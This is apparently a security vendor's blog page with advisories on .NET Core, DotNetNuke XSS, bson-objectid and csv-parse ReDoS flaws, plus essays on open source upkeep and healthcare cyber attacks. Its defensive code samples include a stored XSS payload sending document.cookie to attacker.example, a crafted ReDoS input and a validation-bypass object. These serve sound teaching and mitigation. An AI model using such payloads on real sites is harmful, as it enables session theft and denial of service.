Attention! New .NET Vulnerabilities

4 min read


Greetings App Sec community! Meterian is back with two .NET vulnerabilities that need your attention. Both are of medium to high severity, so give this a read, it will be worth your while. The first is a denial of service in .NET Core itself; the second is a stored cross-site scripting flaw in DotNetNuke. Don't let attackers use either as a way into your systems and networks. Stay protected, people!

  • CVE-2019-1301: .NET Core suffers from a denial of service vulnerability when it improperly handles web requests.
  • CVE-2019-12562: There is a stored cross-site scripting vulnerability in DotNetNuke (DNN) versions before 9.4.0, allowing attackers to store malicious script that is embedded into the administration notification page.

CVE-2019-1301

Vulnerability Score: 7.5/HIGH

Platform: .NET

Affected Versions:

  • .NET Core / Microsoft.NETCore.App: 2.1.0-2.1.12 or 2.2.0-2.2.6
  • System.Net.Sockets: 4.3.0

The first .NET vulnerability we bring to your urgent attention is a denial of service that occurs when .NET Core improperly handles web requests. Any .NET Core based application running on .NET Core 2.1.0 to 2.1.12 or 2.2.0 to 2.2.6 is affected, as is any application that depends on the System.Net.Sockets package at version 4.3.0. This is rated High and should be dealt with immediately.

How can you confirm whether your .NET application is affected? Run dotnet --info (or, more directly, dotnet --list-runtimes) to list the runtimes and SDKs installed on the machine. You will see output like the sample in the announcement linked below:

Microsoft's announcement, which includes a sample of that output: https://github.com/dotnet/announcements/issues/121

If the list shows a 2.1.x runtime below 2.1.13, or a 2.2.x runtime below 2.2.7, then unfortunately you are vulnerable. Compare within each release line: a 2.1.13 install is patched even though 2.1.13 is numerically lower than 2.2.7. The same ranges apply if your project references the Microsoft.NETCore.App meta-package, and the System.Net.Sockets package at version 4.3.0 is affected regardless of which runtime you are on.
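Here is that check as a script, an added example rather than anything from Microsoft's announcement. It parses the runtime lines that dotnet --list-runtimes prints (the same lines appear in dotnet --info) and flags Microsoft.NETCore.App entries inside the affected ranges; the sample listing is constructed for the demo.

```javascript
// Added example: flag installed .NET Core runtimes in the CVE-2019-1301 range.
// Input is the text printed by `dotnet --list-runtimes`, one runtime per line:
//   Microsoft.NETCore.App 2.1.12 [/usr/share/dotnet/shared/Microsoft.NETCore.App]

// First patched version per release line, from the advisory:
// 2.1.0-2.1.12 fixed in 2.1.13, 2.2.0-2.2.6 fixed in 2.2.7.
const FIXED_IN = { '2.1': [2, 1, 13], '2.2': [2, 2, 7] };

// "2.1.12" -> [2, 1, 12]; a prerelease suffix such as "-preview1" is ignored.
function parseVersion(v) {
  const parts = v.split('-')[0].split('.').map(Number);
  if (parts.length !== 3 || parts.some(n => !Number.isInteger(n))) {
    throw new Error(`unrecognised version: ${v}`);
  }
  return parts;
}

function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// True when a Microsoft.NETCore.App version is inside an affected range.
// The comparison is made within the release line (2.1.x against 2.1.13,
// 2.2.x against 2.2.7), never across lines.
function isAffected(version) {
  const v = parseVersion(version);
  const fixed = FIXED_IN[`${v[0]}.${v[1]}`];
  if (!fixed) return false; // 1.x, 2.0.x, 3.x are outside the advisory's ranges
  return compareVersions(v, fixed) < 0;
}

// Parse the runtime listing and return the affected Microsoft.NETCore.App entries.
function affectedRuntimes(listRuntimesOutput) {
  const findings = [];
  for (const line of listRuntimesOutput.split('\n')) {
    const m = line.trim().match(/^(\S+)\s+(\S+)\s+\[(.*)\]$/);
    if (!m) continue;
    const [, name, version, path] = m;
    if (name === 'Microsoft.NETCore.App' && isAffected(version)) {
      findings.push({ name, version, path });
    }
  }
  return findings;
}

// Constructed sample listing (what `dotnet --list-runtimes` might print on a
// machine with several runtimes side by side).
const SAMPLE_LISTING = [
  'Microsoft.AspNetCore.All 2.1.12 [/usr/share/dotnet/shared/Microsoft.AspNetCore.All]',
  'Microsoft.NETCore.App 2.1.12 [/usr/share/dotnet/shared/Microsoft.NETCore.App]',
  'Microsoft.NETCore.App 2.1.13 [/usr/share/dotnet/shared/Microsoft.NETCore.App]',
  'Microsoft.NETCore.App 2.2.6 [/usr/share/dotnet/shared/Microsoft.NETCore.App]',
  'Microsoft.NETCore.App 3.0.0 [/usr/share/dotnet/shared/Microsoft.NETCore.App]',
].join('\n');

for (const f of affectedRuntimes(SAMPLE_LISTING)) {
  console.log(`AFFECTED: ${f.name} ${f.version} at ${f.path}`);
}
```

One caveat before you panic about a flagged runtime: a framework-dependent app built for 2.1 rolls forward to the highest installed 2.1.x patch by default, so having 2.1.13 installed next to 2.1.12 already protects it. A self-contained app ships its own copy of the runtime and must be rebuilt against the patched version.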

What is .NET Core? It is an open-source development platform maintained by Microsoft and the .NET community on GitHub, used to build cloud, device and IoT applications.

Why is this vulnerability such a threat? An attacker who successfully exploits it can deny service to the .NET Core web application, and the exploit works remotely and needs no authentication. A denial of service (DoS) attack aims to make a resource unavailable for its intended purpose, whether by flooding it with traffic, by sending malformed network traffic, or, as here, by triggering a logic or resource-handling flaw in the software itself with a crafted request. The effect is response delays, interrupted services and, for a business, lost revenue: an impact on availability rather than on confidentiality or integrity.

So how can you fix it? Install a patched .NET Core; which one depends on what you already have. On the 2.1 line upgrade to at least 2.1.13, on the 2.2 line to at least 2.2.7. If your project references the Microsoft.NETCore.App meta-package, bump it following the same version numbers, and if you depend on System.Net.Sockets, upgrade it to version 4.3.1.

CVE-2019-12562

Vulnerability Score: 6.1/MEDIUM

Platform: .NET

Component: DotNetNuke

Affected Versions: before 9.4.0

You read right. DotNetNuke (DNN) versions before 9.4.0 contain a stored cross-site scripting vulnerability that allows remote attackers to store malicious script so that it is embedded in the administration notification page. The payload fires when an administrator simply views that page: no crafted link and no further interaction is needed.

A little information on DNN. It runs on Microsoft ASP.NET and is a framework, meaning a program designed to be extended. A single DNN install can host thousands of individual portals; portals display pages, and pages display modules. Most importantly, DNN is an open-source web content management system that many businesses around the world rely on. DNNSoftware.com has had over 1 million registered members since 2013 and DNN is used on nearly 750,000 websites globally, which gives an idea of how many people could be affected and why this needs urgent attention.

The severity is emphasised by the fact that stored cross-site scripting is generally considered the most dangerous kind of XSS: the payload persists on the server and runs for every victim who loads the page, with no phishing link required. Here the victim is an administrator, so the script runs with administrator privileges in the victim's session and can do anything the admin can: manage content, add users, upload backdoors to the server and more.
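To see why this matters, here is a generic illustration of the flaw class, added here and not taken from DNN's code (the notification store and the render functions are assumptions): a notification page that concatenates stored text into HTML, next to the same page with output encoding.

```javascript
// Added illustration of a stored XSS in an admin notification page. Generic
// demo code, not DotNetNuke's: the store and the render functions are assumptions.

// Constructed store. The second entry is what an attacker submits through
// whatever feature lets a low-privileged user create a notification.
const NOTIFICATIONS = [
  { from: 'alice', text: 'Please review the Q3 report.' },
  {
    from: 'mallory',
    text: '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">',
  },
];

// Vulnerable rendering: stored text is concatenated straight into the HTML,
// so the administrator's browser runs mallory's script in the admin session.
function renderNotificationsUnsafe(items) {
  return items.map(n => `<li><b>${n.from}</b>: ${n.text}</li>`).join('');
}

// Output encoding for the HTML text/attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: every untrusted value is encoded for the context it lands in.
function renderNotificationsSafe(items) {
  return items
    .map(n => `<li><b>${escapeHtml(n.from)}</b>: ${escapeHtml(n.text)}</li>`)
    .join('');
}

// Rough check for the demo only (a real review uses a parser or a DOM, not a
// regex): is there a <script> element or an on* event-handler attribute?
function containsActiveContent(html) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i.test(html);
}

console.log('unsafe render executes script:', containsActiveContent(renderNotificationsUnsafe(NOTIFICATIONS)));
console.log('safe render executes script:  ', containsActiveContent(renderNotificationsSafe(NOTIFICATIONS)));
```

The encoding has to match the context the value lands in (HTML body, attribute, JavaScript, URL); a Content-Security-Policy that blocks inline scripts is worthwhile defence in depth but not a substitute.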

Once the vulnerability had been found it was reported to the DNN Software security team, who fixed the problem and released a patch. Update to DNN 9.4.0 or later to close this hole in your systems and networks.

That is it from us…for now! Make sure to spread the word on these .NET vulnerabilities in order to help protect your apps or the apps you develop. But as you all know, open-source vulnerabilities are discovered daily, so you can expect us to be back with new vulnerabilities very soon!

Knowing is half the battle. The other half is doing. Let Meterian help your dev team stay in the know and on top of the latest updates to secure your apps continuously.  Sign up here to download the Meterian client today.  You’ll get an instant analysis of your first project for free.  See the risks immediately and know which components to remove or upgrade to secure your app.


Love Your Developer: How to maintain & secure your open source components?

6 min read

Happy Valentine's Day! Meterian is feeling the love, so we want to share it by telling you the best way your business can love its developers! In this article we highlight the benefits and costs of using open-source software. We also go the extra mile with tips on how to secure and maintain these components without slowing down your developers, the guardians of your business' software and the people who can propel you ahead of competitors.

Here's a little history lesson to begin with. From the 1940s to the 1970s software moved slowly and was not even regarded as a valuable asset in its own right. The 1980s brought software copyright, and with it a boom in software innovation and in software companies. As the decades went on, people started to realise the value of open source software.

From 2000 onwards, the use of open source projects and components grew significantly. Market research has predicted the global open source market will grow from USD 11.40 billion in 2017 to USD 32.95 billion by 2022. Open source has lowered development costs and accelerated innovation by cutting time to market, and companies that innovate early are reported to be 67% more likely to outperform their peers.

Benefits of open source software 

Sometimes taking advantage of free resources is simply better. By 2010 the use of open source was so common it had become table stakes: every company was using it, and those that did not were at a disadvantage to their competitors. Open source speeds up software and hardware solutions, saves money, provides flexibility and helps companies stay on top of technological developments. A survey found that 53% of companies have an open source programme or plan to establish one in the near future.

Developers are able to become creative and help solve problems in the software space when using open source solutions. It is the consumer and producer relationship that makes open source software thrive. As a result, there is more software availability for all users without having to reinvent the wheel. This in turn helps organizations. Recent research from Harvard Business School has shown that open source contributing companies capture up to 100% more productive value from open source than companies that do not contribute back. It creates a snowball effect: the more companies use it, the more the community is able to survey, criticize and praise it. Therefore, this strengthens the quality of the software used, including its security, usability and stability.

Open source also brings management benefits. Organisations tend to struggle with huge volumes of structured and unstructured data, and open source tooling can help: it simplifies business processes and frees resources from work that is not core to the success of the business. In short, it gives the company more flexibility.

Customer value matters too. Because open source is flexible, companies can customise it to suit the needs of their particular customers: integrating two pieces of software through existing open source connectors, for example, takes far less time than writing the integration from scratch. Both the company and its customers benefit, and customers may even pay more for a solution that meets their needs this quickly. It is all about viewing open source software as a resource and a powerful motivator.

Costs 

When it comes to the law, access to open source can be restricted by country. GitHub made headlines when it restricted developers in Cuba, Iran, North Korea and Syria from using private repository services, and open source licences have been revised in response to situations like this, so that the ecosystem can keep growing without running into international rules on software access. Companies should always know which licences are attached to the software they use, to avoid an IP breach. Read our past blog post on how the wrong licence can harm your business, if you haven't already!

Moreover, open source components are attractive to attackers. Firstly, new vulnerabilities in open source components are disclosed daily. Secondly, traditional testing tools and methods are poor at identifying vulnerable third-party components, so few companies actually know which components their applications contain. That lack of awareness leaves organisations increasingly exposed. For example, Hollywood Presbyterian Hospital in California suffered a ransomware attack through an outdated JBoss application server: the attacker uploaded malware to the unpatched server without any interaction from a victim. Patient care was delayed and the hospital paid $17,000 to recover access to its files and network.

A further cost is the need to constantly maintain, test and secure these components. In 2018 Sonatype's fourth annual State of the Software Supply Chain Report showed that developers had downloaded more than 300 billion open source components in the previous 12 months, and that 1 in 8 of them contained a known security vulnerability.

Not catching these security bugs early on in the development process can lead to very costly and damaging outcomes.

How to maintain and secure open source components?

Firstly, make an inventory of every open source component you use when developing software. It must list every component, the exact version in use and where it was downloaded from, for each project. Such an inventory is a software bill of materials (SBOM).

You also need to map known security vulnerabilities onto that inventory. The National Vulnerability Database (NVD) is a good source of information on publicly disclosed vulnerabilities in open source software, but do not make it your only source: not every vulnerability gets a CVE, some are published late, and the format of NVD records makes it hard to tell exactly which versions are affected. Meterian uses several sources in addition to the NVD.
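An inventory plus a cross-reference, as an added example (our own demo, not Meterian's tooling): it walks an npm lockfile, records each component with its exact version, download location and the dependency chain that pulled it in, and flags entries that fall inside known-vulnerable ranges. The lockfile, the package some-lib and the advisory list are constructed for the demo; a real run would read package-lock.json from disk and take the advisories from the NVD and other sources.

```javascript
// Added example, not Meterian's tooling: build a component inventory (a minimal
// SBOM) from an npm lockfile and flag entries matching known-vulnerable ranges.
// The lockfile content, the package "some-lib" and the advisory list are
// constructed for the demo; a real run reads package-lock.json from disk and
// pulls advisories from the NVD and other sources.

// Constructed package-lock.json (lockfileVersion 1: nested "dependencies").
const LOCKFILE = {
  name: 'demo-app',
  version: '1.0.0',
  lockfileVersion: 1,
  dependencies: {
    'csv-parse': {
      version: '4.4.5',
      resolved: 'https://registry.npmjs.org/csv-parse/-/csv-parse-4.4.5.tgz',
    },
    'some-lib': {
      version: '2.0.0',
      resolved: 'https://registry.npmjs.org/some-lib/-/some-lib-2.0.0.tgz',
      dependencies: {
        'bson-objectid': {
          version: '1.3.0',
          resolved: 'https://registry.npmjs.org/bson-objectid/-/bson-objectid-1.3.0.tgz',
        },
      },
    },
  },
};

// Constructed advisories. `fixedIn` means every earlier version is affected;
// `exact` lists affected versions when no fixed release exists yet.
const ADVISORIES = [
  { id: 'CVE-2019-17592', component: 'csv-parse', fixedIn: '4.4.6' },
  { id: 'CVE-2019-19729', component: 'bson-objectid', exact: ['1.3.0'] },
];

// "4.4.5" -> [4, 4, 5]; numeric comparison, component by component.
function parseVersion(v) { return v.split('-')[0].split('.').map(Number); }
function lessThan(a, b) {
  const [x, y] = [parseVersion(a), parseVersion(b)];
  for (let i = 0; i < Math.max(x.length, y.length); i++) {
    const d = (x[i] || 0) - (y[i] || 0);
    if (d !== 0) return d < 0;
  }
  return false;
}

// Walk the lockfile depth-first. Each entry records name, exact version, where
// it was downloaded from and the chain of dependencies that pulled it in.
function inventory(lock) {
  const items = [];
  const walk = (deps, chain) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const path = [...chain, name];
      items.push({ name, version: meta.version, resolved: meta.resolved, via: path.join(' > ') });
      walk(meta.dependencies, path);
    }
  };
  walk(lock.dependencies, []);
  return items;
}

// Cross-reference the inventory against the advisories.
function findVulnerable(items, advisories) {
  const hits = [];
  for (const item of items) {
    for (const adv of advisories) {
      if (adv.component !== item.name) continue;
      const affected = adv.fixedIn ? lessThan(item.version, adv.fixedIn) : adv.exact.includes(item.version);
      if (affected) hits.push({ ...item, advisory: adv.id });
    }
  }
  return hits;
}

const SBOM = inventory(LOCKFILE);
console.log(`${SBOM.length} components in the inventory`);
for (const hit of findVulnerable(SBOM, ADVISORIES)) {
  console.log(`${hit.advisory}: ${hit.name}@${hit.version} via ${hit.via} (${hit.resolved})`);
}
```

The transitive entry is the point: bson-objectid never appears in this project's own package.json, only in the lockfile, which is why the inventory has to come from the lockfile and not from the declared dependencies.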

Open source is a brilliant resource, but keeping its benefits requires effort to secure the components and lower the risk of them being exploited. A study by Kula et al. of 4,600 GitHub projects found that 81.5% of them do not update their direct library dependencies, even in cases where the dependency has a publicly known vulnerability. This emphasises the lack of awareness about security vulnerabilities in open source software. To secure your open source components you need to upgrade promptly and keep on top of known vulnerabilities.


Security is a community effort. Every project's testing process is open to everyone, and developers using open source software can judge it for themselves: the community is constantly evaluating and testing components and feeding back the issues it finds. This is the argument that open source can be safer than proprietary software, because more people are able to inspect and test it; it only holds if people actually do the looking. At the same time, take care over which code contributions you accept: every open source contribution should go through a governance process and review.

Constant vigilance is key. More than 3,600 new open source vulnerabilities are discovered every year, so new ones appear every day. Developers need to make sure their use of open source is secure, asking: is the code I am using good? Does it have known bugs? Because vulnerabilities are identified daily, some higher risk than others, organisations need a practice of monitoring or testing every time the software changes.

Meterian helps businesses get the most out of their software investments

Open source software has been changing how our world works, giving us a sustainable ecosystem that can work for everyone as long as it is looked after.

Meterian can automatically inventory your open source components and analyse them to check if they are up-to-date or have any publicly disclosed security and licence risks. Get started on building a proactive defence for your customer data and software IP.  Love your developers and let them innovate freely while using Meterian to secure your open source components. We can block insecure code before it goes live.  It will save you and your developers time and money, allowing your business to be less vulnerable to cyber attacks.  

Check whether there are any open source security holes in your company's website that put your business at risk of a data or IP breach before it's too late.

Try our free webscanner today.


Data Protection Day!


Yesterday, 28 January, was an important day: the Council of Europe celebrated the 14th edition of Data Protection Day.

The day exists to raise awareness of good practice in data protection and to inform users about their rights and how to exercise them.

The date marks the anniversary of the opening for signature of the Council of Europe's Convention 108 for the Protection of Individuals with regard to Automatic Processing of Personal Data. For more than 30 years this has been a cornerstone of data protection, in Europe and around the world.

Why is Data Protection so important?

Data protection issues run through everyone's lives: at work, in public relations, in the health sector, when buying goods and services, when travelling or simply when using the internet.

However, not everyone is informed about their rights. That is why 28 January is set aside to inform users about their rights and to get data protection professionals talking to data subjects. It is important that our digitally advanced society understands what personal data is collected about them and why, and what their rights are when that data is processed. That in turn helps users understand the risks that come with illegal mishandling and unfair processing of personal data.

Meterian can help!

Here is a list of our blog posts that can help users be more cyber resilient and diligent when it comes to managing sensitive data.

Read also our past blog posts about vulnerabilities in:

to make sure your apps are not susceptible to such exploits that would risk data confidentiality.


Read up on more Node.js Vulnerabilities!

It's that time of the week again, folks. Meterian has two new Node.js vulnerabilities to tell you about. Both carry a severity score of 7.5 (High) and therefore need urgent attention. The first concerns the bson-objectid package and the second the csv-parse module. Act fast and don't let these vulnerabilities sit in your software, or you could be at serious risk of a cyber attack.

  • CVE-2019-19729: An issue was discovered in the bson-objectid package version 1.3.0 for Node.js. An attacker can supply a malformed ObjectID: an object of arbitrary shape bypasses formatting and validation as long as it carries a valid bsontype property.
  • CVE-2019-17592: The csv-parse module before version 4.4.6 for Node.js is vulnerable to Regular Expression Denial of Service. An attacker can cause a program to spend an unnecessary amount of time processing.

CVE-2019-19729

Vulnerability Score: 7.5 /HIGH

Platform: Node.js

Component: bson-objectid

Affected Versions: up to 1.3.0

Node.js users, read up, you'll want to know about this one! It was discovered on 12 December 2019 by GitHub user Xiaofen9, who noticed that ObjectID() allows an attacker to generate a malformed objectid by inserting an additional property into their user input.

What is bson-objectid? This component allows you to create and parse ObjectIDs without using bigger components, such as other fully-fledged bson libraries.

The problem is that in certain conditions the input object will not be checked and will be returned early. This means that objects in arbitrary (potentially malicious) forms can completely bypass formatting and validation.

https://github.com/williamkapke/bson-objectid/issues/30

So what can attackers do? Manipulation of this unvalidated input has been classified as a privilege escalation vulnerability, with a potential impact on confidentiality, integrity and availability. What that means in practice depends on where the unvalidated object ends up: anything downstream that trusts an ObjectID to be a well-formed 12-byte identifier (a database query, an authorisation check) is now handling attacker-controlled data.

But what does a privilege escalation vulnerability actually entail? It is when a malicious user gains the privileges of another user account on the target system, and uses them to steal confidential data, run administrative commands or deploy malware.

What can you do to fix this? Unfortunately, at the time of writing there is no patched release. We recommend validating ObjectID input yourself (accept only a 24-character hexadecimal string, never a parsed object) before it reaches the library, and either ceasing to use this component or switching to a full BSON library such as bson.
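The shape of the problem, and the defensive gate we recommend, as an added example (our own code, not bson-objectid's; the class, the field names and the attacker's JSON are constructed for the illustration):

```javascript
// Added example, not bson-objectid's code. NaiveObjectID reproduces the shape of
// the reported bug (an early return for anything that carries the expected type
// tag); toObjectIdOrNull is an input gate that closes the hole regardless of how
// the library behaves. Field names and the attacker's JSON are constructed.

class NaiveObjectID {
  constructor(input) {
    // The flaw: an object that merely claims to be an ObjectID is handed back
    // untouched, so none of the validation below runs on it.
    if (input && (input instanceof NaiveObjectID || input._bsontype === 'ObjectID')) {
      return input;
    }
    if (typeof input !== 'string' || !/^[0-9a-fA-F]{24}$/.test(input)) {
      throw new TypeError('ObjectID must be a 24-character hex string');
    }
    this._bsontype = 'ObjectID';
    this.id = Buffer.from(input, 'hex'); // the 12 raw bytes
  }
  toHexString() {
    return this.id.toString('hex');
  }
}

// What an attacker posts where the application expects an id string. Because it
// carries the type tag, NaiveObjectID returns it as-is, extra properties included.
const ATTACKER_INPUT = JSON.parse(
  '{"_bsontype":"ObjectID","id":"not-an-id","smuggled":"anything"}'
);

// Mitigation in application code: accept only the wire format you expect from
// users (a 24-hex-char string) before the value gets anywhere near the library.
function toObjectIdOrNull(untrusted) {
  if (typeof untrusted !== 'string') return null;  // objects, arrays, numbers: out
  if (!/^[0-9a-fA-F]{24}$/.test(untrusted)) return null;
  return new NaiveObjectID(untrusted);
}

const passedThrough = new NaiveObjectID(ATTACKER_INPUT);
console.log('library returned the attacker object unchanged:', passedThrough === ATTACKER_INPUT);
console.log('gate rejects it:', toObjectIdOrNull(ATTACKER_INPUT) === null);
console.log('gate accepts a real id:', toObjectIdOrNull('507f1f77bcf86cd799439011').toHexString());
```

The gate belongs at the trust boundary (request parsing), because a JSON body can carry an object wherever the application expected a string, and the type tag is just another attacker-controlled property.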

CVE-2019-17592

Vulnerability Score: 7.5/ HIGH

Platform: Node.js

Component: csv-parse module

Affected Versions: up to 4.4.5

Oh yes, we are not done yet. Here is another Node.js vulnerability for you! This one was discovered on 14 October and scored 7.5 (High) by NVD. The affected module is csv-parse, a parser that converts CSV text into objects. It uses the Node.js stream.Transform API and also offers a simple callback-based API. First released in 2010, it is easy to use and popular with the large community that processes big data sets with it.

The problem is that csv-parse before version 4.4.6 is vulnerable to Regular Expression Denial of Service (ReDoS). The module's cast option defines several functions that convert values according to their type. When that option is active and an integer cast is requested, the corresponding __isInt() function uses a badly constructed regular expression that takes an extremely long time on large inputs that do not match.

Why is ReDoS a way in for attackers? The attacker puts a string in the CSV file that they know will take the regular expression engine a very long time to evaluate. Node.js runs JavaScript on a single thread, so while the regex is backtracking the whole process is stuck: other requests are not served and the application appears to hang. Availability degrades or disappears. To make things worse, the attacker only needs to get a file parsed, which is usually possible remotely and without credentials, which is why this vulnerability is rated High.
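To make this concrete, here is an added example (our own illustration, not code from csv-parse): an integer check written with overlapping quantifiers of the kind described, a linear alternative that accepts exactly the same strings, and a crafted cell that makes the difference measurable. The vulnerable pattern is reconstructed from the description and is not copied from the module.

```javascript
// Added example, not csv-parse's code: an integer test written with the kind of
// overlapping quantifiers described above, a linear replacement with the same
// verdicts, and a crafted cell that exposes the difference. The vulnerable
// pattern is reconstructed from the description, not copied from the module.

// [1-9]+ and [0-9]* can both consume the same digits. When the trailing $ fails,
// the engine retries every way of splitting the digit run between the two
// quantifiers: quadratic work in the length of the run.
const INT_RE_BACKTRACKING = /^[-+]?([1-9]+[0-9]*)$/;

// Same language (optional sign, no leading zero) with a single, unambiguous way
// to match each digit, so a failing input is rejected in linear time.
const INT_RE_LINEAR = /^[-+]?[1-9][0-9]*$/;

function isIntBacktracking(cell) { return INT_RE_BACKTRACKING.test(cell); }
function isIntLinear(cell) { return INT_RE_LINEAR.test(cell); }

// A crafted cell: a long run of digits that is not an integer because of the
// final character. Both regexes say "no"; only one takes long to say it.
function craftedCell(digits) { return '1'.repeat(digits) + 'x'; }

// Wall-clock milliseconds for one call.
function timeMs(fn) {
  const start = process.hrtime.bigint();
  fn();
  return Number(process.hrtime.bigint() - start) / 1e6;
}

// Same verdicts, very different cost; the gap grows with the square of n.
for (const n of [1000, 4000, 16000]) {
  const cell = craftedCell(n);
  console.log(
    `n=${n}: backtracking ${timeMs(() => isIntBacktracking(cell)).toFixed(1)} ms, ` +
    `linear ${timeMs(() => isIntLinear(cell)).toFixed(1)} ms`
  );
}
```

The general rule when reviewing a regex that runs on untrusted input: look for adjacent quantified pieces that can match the same characters (here two digit classes, in other cases nested groups like (a+)+), because each such overlap is a choice the engine must revisit on every failed match. Capping the length of a cell before it reaches the regex is a cheap second line of defence.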


The best thing to do to avoid getting caught out is to upgrade csv-parse to version 4.4.6 or later.

That is it from us… for now! Make sure to spread the word on these high-rated Node.js vulnerabilities to help protect your apps and the apps you develop. But as you all know, open source vulnerabilities are discovered daily, so expect us back with new ones very soon!



The Healthcare Sector: A Major Target for Cyber Attacks


The healthcare sector is innovating rapidly in its medical practices. Forbes estimated that digital health technology for out-of-hospital settings would grow by 30% to exceed a $25 billion global market by the end of 2019.

Alas, with the growth of innovation in this sector, there also comes the risk of cyber attacks. The healthcare sector in particular seems to be a major target for cyber criminals. Why is this? What is the financial impact? And most importantly what can be done?

Why do cyber criminals target the healthcare sector?

There are many reasons why the healthcare sector is a target:

  • One of the main reasons has to do with the financial worth of the masses of patient information hospitals store. With the introduction of GDPR (May 2018) it has never been so crucial for hospitals and businesses to keep patient data secure.
  • Medical devices tend to be easy entry points. Because they are designed around a clinical purpose, security is often not part of the design. The devices themselves may not store patient data, but a compromised device gives an attacker a foothold from which to attack the servers that do. A vulnerability was found, for example, in a Johnson & Johnson insulin pump that could have allowed attackers to take control of the device over its wireless link and deliver an insulin overdose to the patient.
  • Medical staff are accessing data remotely on different devices and networks, which provides another entry point for attackers. The problem is that if one device is hacked, this might leave the rest of the organisation vulnerable.
  • Despite the sector's progress, staff are often reluctant to disrupt working practices by introducing new technology. This leaves outdated software in place in the organisation's IT systems, and outdated software is an entry point for attackers.
  • Tight budgets, lack of resources and time constraints make it hard for healthcare staff to be fully trained in cybersecurity practices.
  • The vast amount of devices used in a hospital makes it hard for IT specialists to protect the entire hardware network against attacks.
  • A very serious reason why the healthcare sector is targeted is also to do with international espionage. For example:
  • John Riggi, a former FBI cyber specialist: Hospitals are “being targeted by hostile nation-states for theft of intellectual property related to medical research, innovations, cancer studies, population health studies, research of medicine and clinical trials, and also potentially for conversion for military use such as biological weapons”
  • They might target hospitals to acquire the medical details of business leaders, politicians or military figures. An example is seen when the Singaporean government health database was hacked in 2018. Prime Minister Lee Hsien Loong was amongst the 1.5 million whose personal data was stolen from the database.
  • Another problem is if hackers target hospitals near military installations this could give sensitive records of military personnel and worse, insight into where troops might be deployed.

Popular cyber attacks within the healthcare sector

The most common attacks on the healthcare sector have proved to be:

  1. Ransomware attacks

Ransomware is a type of malware that encrypts systems and files, making them inaccessible until a ransom is paid. For a hospital this slows everything down and often forces a return to pen and paper. A recent example was last November's ransomware attack on the university hospital in Rouen, France. More worryingly, the 2017 Healthcare Cybersecurity Report suggested ransomware attacks on the sector would quadruple by 2020, and attackers are using more sophisticated tactics: 350 different ransomware variants were observed in 2018 compared with 241 the year before.

These attacks usually reach machines through phishing emails with malicious attachments, a user clicking a malicious link, or an advertisement carrying malware. An entry point that is often overlooked is ransomware delivered through an outdated component or server. Hollywood Presbyterian Hospital in California, for example, suffered a ransomware attack through an outdated JBoss application server: the attacker uploaded malware to the unpatched server without any interaction from a victim, patient care was delayed and the hospital paid $17,000 to recover access to its files and network. Notably, the attackers used an open source tool, JexBoss, to scan the internet for vulnerable JBoss servers. Organisations that handle healthcare data have to keep their systems updated, because unpatched, internet-exposed software is a recurring entry point for ransomware.


What is a JBoss server? An open source application server for developing and deploying enterprise Java applications, services and web portals. The community project shipped its last release under that name (7.1.1) in 2012 and was renamed WildFly for the next release, so if you are running a server that still identifies itself as the community JBoss AS, it is out of date and has been for a very long time. (Red Hat's commercially supported JBoss Enterprise Application Platform kept the JBoss name and is a separate, still-maintained product.)

  2. Data breaches

Data breaches happen for many reasons, from credential-stealing malware to insider threats to lost devices. The reason they are so common in healthcare is that Personal Health Information (PHI) is worth more on the black market than financial data or other Personally Identifiable Information (PII).

But why is PHI more valuable than PII? The average cost of a data breach for a non-healthcare organisation is $158 per stolen record, yet for the healthcare sector the average is $355. According to the Infosec Institute, PII can sell on the black market for $1-2 per record, while PHI has been said to be worth up to $363.

This shows the value of patient data financially. However, PHI can be valuable also to target victims with fraud scams by taking advantage of their medical conditions. Cyber criminals have also been known to use stolen patient data to access prescriptions for their own use or resale. 

With the enforcement of GDPR since May 2018, securing patient and medical records has never been so important.

  3. Insider Threats

Did you know healthcare is the only industry in which the biggest data breach threat comes from internal sources? According to the 2019 Verizon Insider Threat Report, 46% of healthcare organisations were affected by insider threats.

Insider threats stem from a lack of cybersecurity training among staff, from employees deliberately giving away access codes, or from staff selling PHI or PII for profit. For example, the medical insurer Anthem learned in 2017 that an employee had been misusing and stealing Medicaid member data, the PHI of up to 18,000 members, since as early as July 2016. Healthcare organisations need to be vigilant about how their own people handle PHI.

  4. Business email compromise

Business email compromise is when attackers use spoofed emails to trick an employee into transferring money to a fraudulent account. The fraudsters normally pose as a person of authority within the company so that the request looks legitimate. It works because they research their targets thoroughly, impersonate the individual convincingly and send the email to only a select few people.

For example, in 2015 a local medical center reported that they had received a call from a pharmacy to confirm a large order of prescription drugs amounting to over $50,000. After a thorough investigation they discovered that the medical center had not placed that order. The pharmacy had called to check because the shipping address of the medical center didn’t match their records, yet all of the other credentials provided had been correct, such as:

  • The Drug Enforcement Administration (DEA) registration number
  • Doctor licences
  • Pharmaceutical certificates

This clearly demonstrates how cyber crime is becoming more sophisticated.

The Financial Impact

Data breaches are particularly hard on the healthcare sector because organisations take longer to deal with an attack, for lack of financial resources or trained personnel. To make matters worse, by 2020 security breaches are said to cost the healthcare sector 6 trillion dollars. A study by Mid-Horizon found that attackers can very easily obtain domain-level administrative privileges in most healthcare applications.

The financial damage the WannaCry attack placed on the NHS in 2017 was significant. The Department of Health said the attack cost the NHS £92 million due to a third of hospital trusts and 8% of GP practices had affected computers. The hack forced 200,000 computers to lock out their users with red-lettered error messages demanding a ransom in Bitcoins. 

This is all the more reason the healthcare sector needs to prioritise cybersecurity, as these sorts of attacks can have crippling consequences.


What can be done? 

On a national level, some countries set a good example. After the cyber siege in 2007, the Estonian government created a cybersecurity strategy built into its law enforcement. After one of its reports found that 11,000 cybersecurity incidents happened in 2018, Estonia introduced blockchain technology to gain more control over electronic patient records. This created a time-stamped record of anyone who accessed, added or removed information. In addition, patients use electronic identification cards to access their health information and can decide whom they share it with.

Although many security executives think that their programs provide sufficient protection, these programs might not be securing the actual patient or member data. There needs to be a clear distinction between a compliance-driven strategy, whose programs do not stand up to the test of the attackers, and a security-driven strategy, whose programs are designed to deal with attackers and the threats they create. This means refocusing on the actual risks of the healthcare infrastructure:

  • Where is the patient data?
